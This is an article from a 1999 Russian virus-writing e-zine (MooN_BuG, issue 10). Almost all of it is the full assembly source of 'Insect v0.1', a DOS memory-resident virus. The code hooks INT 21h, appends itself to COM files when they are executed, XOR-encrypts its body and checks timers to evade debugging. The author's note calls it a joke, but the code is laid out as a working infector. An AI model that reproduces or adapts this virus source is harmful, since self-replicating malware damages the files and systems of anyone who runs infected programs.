[TulaAnti&ViralClub] PRESENTS ...
MooN_BuG, Issue 10, Apr 1999                                          file 00B

                            Insect v0.1 tiny virus
                                                   by B!Z0n

     Это  не  виpyс, это сплошной пpикол, пpосто наглая заготовка, поэтомy веб
его не видит ;-) Посмотpите, но не пpинимайте всеpьез.

=== Cut ===                                                        ins_bzz.asm
; 17.03.1999
; Insect v0.1 tiny virus (c) B!Z0n //[BzZ]
;
; 4 more viruses call BaDhEAD station
; Phone: 7-812-524-5789 23:00-08:30
;
; good luck to you!
;
model tiny
codeseg
startupcode
p286

start:
        int     12h
        shl     ax, 6
        dec     ax
        push    ax
        mov     es, ax
        mov     cx, crypted-decryptor
        lea     si, decryptor
        mov     di, si
        push    si
    rep movsb
        retf
decryptor:
        push    es
        push    ds si ds
        pop     es
        mov     cx, finish-crypted
        mov     ah, byte ptr [crypted]
        xor     ah, 90h
        push    ax
        in      ax, 42h
        mov     dx, ax
        in      ax, 42h
        cmp     ax, dx
        pop     ax
        jne     @lab1
        retf
@lab1:
        lodsb
        xor     al, ah
        stosb
        loop    @lab1
        retf
crypted:
        nop
        mov     ax, 1999h
        int     21h
        jnc     install
        jmp     exit
install:
        mov     ax, 3521h
        int     21h
        mov     word ptr [old21h], bx
        mov     word ptr [old21h+2], es
        mov     ax, 2521h
        lea     dx, newint
        int     21h
        lea     dx, finish + (finish-start)
        int     27h                           ;) Внаглую!!!! ;)))
;------------------------------------------------------------------
VirusName       db  0,0,'Insect v0.1'
Copyright       db  0,'(c) B!Z0n //[BzZ]',0,0
;------------------------------------------------------------------
newint:
        push    ax
        pushf
        sub     ah, 19h
        jne     no_vir
        cmp     al, 99h
        jne     no_vir
        stc
        pop     ax ax
        retf    0002
no_vir:
        sub     ah, (4Bh-19h)
        jne     oldint

EXEC:   or      al, al
        jne     oldint
INFECT:
;---------------------------
        push    es ds bx cx dx di si
open:
        mov     ax, 3d02h
        int     21h
        jc      err_exit
        xchg    ax, bx
read:
        push    cs cs
        pop     ds es
        mov     ah, 3fh
        mov     cx, finish-start
        lea     dx, finish
        int     21h
        jc      err_exit
        cmp     word ptr finish, 'ZM'   ; EXE'шник?
        je      err_exit
        cmp     word ptr finish, 012CDh ; уже инфицирован?
        je      err_exit
        cmp     ax, finish-start        ; программа больше чем вирус?
        jb      err_exit

        push    ax
write_end:
        mov     al, 02h                  ;(((((((((((
        call    lseek
        mov     si, OFFSET start
        add     ax, si
        mov     word ptr [heap], ax
        mov     ah, 40h
        pop     cx
        lea     dx, finish
        push    dx
        int     21h
modyfic:
        pop     di
        mov     cx, crypted-start
    rep movsb
        mov     cx, finish-crypted
        in      ax, 40h
@lab2:
        lodsb
        xor     al, ah
        stosb
        loop    @lab2

write_start:
        xor     al, al
        call    lseek
        mov     ah, 40h
        lea     dx, finish
        mov     cx, finish-start
        int     21h
err_exit:
        mov     ah, 3eh
        int     21h

        pop     si di dx cx bx ds es
;---------------------------
oldint:
        popf
        pop     ax
                db  0EAh
;---------------------------
old21h          db  4 DUP(?)
;---------------------------
Lseek:
        mov     ah, 42h
        xor     cx, cx
        cwd
        int     21h
        ret
exit:
        pop     es
        lea     si, exit_1
        mov     di, 100h
        push    es di
        mov     cx, finish-exit_1
    rep movsb
        retf
exit_1:
        push    ds
        pop     es
        mov     si, 0000h
heap    equ     $-2
        mov     di, 100h
        push    ds di
        mov     cx, finish-start             ; viruslen
    rep movsb
        retf
finish:
        mov     ah, 4ch
        int     21h
end
;
;
=== Cut ===